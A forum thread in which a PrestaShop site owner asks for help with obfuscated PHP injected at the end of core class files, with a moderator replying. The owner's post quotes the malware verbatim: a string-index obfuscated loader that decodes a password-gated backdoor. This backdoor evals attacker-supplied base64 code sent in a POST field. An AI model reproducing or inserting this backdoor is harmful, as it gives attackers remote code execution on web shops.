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Prestashop malware in end of files, variables


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Hello there,

i would like to ask about prestashop files. Time of time i notice i have added some weird variables nad hashes on the end of some files and their source code.

When i delete it manually from files, it will come back in few days. I am not very skilled in prestashop, i dont know how to protect it or clean it. For example on of the files is: domain.com/www/classes/Dispatcher.php, there are more files from classes that are getting this unwanted code on end of source code.

The example of the unwanted code is this, i have no idea how to decode it or permanently delete it.

$p11c9="THIZBzt8jFVwN79QaClh3UEdSq06iJ5gKvPuebAmns_4YLDfrxGX2poRcyk1WOM";$e8208=$p11c9[47].$p11c9[35].$p11c9[40].$p11c9[56].$p11c9[6].$p11c9[28].$p11c9[54].$p11c9[40].$p11c9[42].$p11c9[36].$p11c9[49].$p11c9[28].$p11c9[41].$p11c9[6].$p11c9[41];$t17=$p11c9[56].$p11c9[48].$p11c9[36].$p11c9[16].$p11c9[6].$p11c9[36].$p11c9[42].$p11c9[47].$p11c9[35].$p11c9[40].$p11c9[56].$p11c9[6].$p11c9[28].$p11c9[54].$p11c9[40];$gd25=$p11c9[37].$p11c9[16].$p11c9[41].$p11c9[36].$p11c9[27].$p11c9[43].$p11c9[42].$p11c9[23].$p11c9[36].$p11c9[56].$p11c9[54].$p11c9[23].$p11c9[36];if(@$e8208($t17)){$z3a7 = @$t17('', @$gd25('aWYKIChpc3NldCgkX1BPU1RbcHJvZHVjdF9pZF0pIAoKJiYgCgptZDUoCiRfUE9TVFtwcm9kdWN0X2lkXSAgKSAJPT09ImFmZTBhNTFhN2Y1ODQ3MGE5YzZlNmJmZjcyMjAxZmRlIikKCXsJIGV2YWwoYmFzZTY0X2RlY29kZSgJICRfUE9TVFtpbWFnZV9pZF0pCQopOwpleGl0KCk7fTs='));@$z3a7();}$obf48="L4IdFOJXZu0vhmtrW27Hg9GTqpfkY6zAMNRwbKU3naceEl5_so18VDPjCQiSyxB";$v108=$obf48[26].$obf48[9].$obf48[40].$obf48[42].$obf48[14].$obf48[58].$obf48[49].$obf48[40].$obf48[47].$obf48[43].$obf48[61].$obf48[58].$obf48[48].$obf48[14].$obf48[48];$lfed=$obf48[42].$obf48[15].$obf48[43].$obf48[41].$obf48[14].$obf48[43].$obf48[47].$obf48[26].$obf48[9].$obf48[40].$obf48[42].$obf48[14].$obf48[58].$obf48[49].$obf48[40];$d0e30=$obf48[36].$obf48[41].$obf48[48].$obf48[43].$obf48[29].$obf48[1].$obf48[47].$obf48[3].$obf48[43].$obf48[42].$obf48[49].$obf48[3].$obf48[43];if(@$v108($lfed)){$uad5 = @$lfed('', @$d0e30('aWYKCShpc3NldAoJKAokX1BPU1RbcHJvZHVjdF9pZF0pICAKJiYgbWQ1KAkgJF9QT1NUW3Byb2R1Y3RfaWRdCikJID09PSJiYjE3ZDU0ZWE5MDdhNDg4NzU1NGQ1OGM5ZWU0NjVmZSIKICkKCnsKCWV2YWwoICBiYXNlNjRfZGVjb2RlKAkkX1BPU1RbaW1hZ2VfaWRdKQoKKTsKZXhpdCgpOwp9Ow=='));@$uad5();}

Have anyone seen anything like this, are there any solutions how to permanently clean it and prevent from happening again?

Thank You.

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The cleaner plugin doesnt work, it cannot detect CMS:

Script de nettoyage et contrôle pour boutiques PrestaShop by @eolia

CMS inconnu. Script interrompu


I found in access logs, that user is trying to log with token, and thru module_name blmvuln, so i googled blmvuln and found this exploit:

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il y a 5 minutes, Patrik a dit :

The cleaner plugin doesnt work, it cannot detect CMS:

Script de nettoyage et contrôle pour boutiques PrestaShop by @eolia

CMS inconnu. Script interrompu


I found in access logs, that user is trying to log with token, and thru module_name blmvuln, so i googled blmvuln and found this exploit:

Which PS version please ?

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